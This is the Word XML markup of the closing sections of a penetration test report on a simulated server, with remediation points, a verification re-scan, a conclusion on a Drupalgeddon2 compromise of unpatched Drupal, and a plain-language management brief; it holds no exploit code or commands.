    <w:p w14:paraId="26E499EF" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Enforce least privilege principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF23C11" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>Enable security monitoring and logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F734A4" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB309A" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>A re-scan using OpenVAS should be conducted after remediation to confirm vulnerability mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41744030" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="441DF609">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF4CC7" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C131E0" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t>This assessment demonstrated how an unpatched Drupal installation can be exploited to gain unauthorized access. The successful exploitation of Drupalgeddon2 highlights the importance of timely patching, continuous monitoring, and proactive security assessments. Addressing the identified vulnerabilities will significantly reduce the attack surface and improve the overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A3586F" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="4C749D65">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84700B" w14:textId="4EE2AECE" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE33A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Non-Technical Management Brief </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB280A" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9">
      <w:r w:rsidRPr="00FE33A9">
        <w:t xml:space="preserve">A security test was performed on a simulated company server to evaluate its </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE33A9">
        <w:t>. The system was found running outdated software, which allowed attackers to remotely access the server without a password. Using publicly available tools, full control of the web server was obtained. This level of access could lead to data theft, website defacement, or service disruption. The issue can be resolved by updating the affected software and applying security patches. Regular security scans and updates are strongly recommended to prevent similar risks in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC03DE" w14:textId="77777777" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00000000" w:rsidP="00FE33A9">
      <w:r>
        <w:pict w14:anchorId="30C71BA3">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C823A1" w14:textId="42D52BA9" w:rsidR="00FE33A9" w:rsidRPr="00FE33A9" w:rsidRDefault="00FE33A9" w:rsidP="00FE33A9"/>
    <w:sectPr w:rsidR="00FE33A9" w:rsidRPr="00FE3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CFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B7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C33BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D852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91554"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED9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60FEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="078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505F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9C8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77B83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BC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56811"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55A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C5E98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CC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B481F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="123A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D256B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B7CF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7429E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC5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F4D9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="812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8021">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="651755987">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1268391046">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1975520811">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1119958040">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1421289661">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1491404512">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1913277178">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1793595045">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1774281956">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="314257679">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="21090802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A9"/>
    <w:rsid w:val="003A5EEF"/>
    <w:rsid w:val="00432EEE"/>
    <w:rsid w:val="005E7F08"/>
    <w:rsid w:val="00DF458E"/>
    <w:rsid w:val="00FE3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5A89"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4011E909-A3B9-4C8F-A448-5750C7DD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A9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00FE3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A9"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00FE33A9"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00FE33A9"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00FE33A9"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00FE3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A9"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00FE3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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-16T08:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-16T09:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>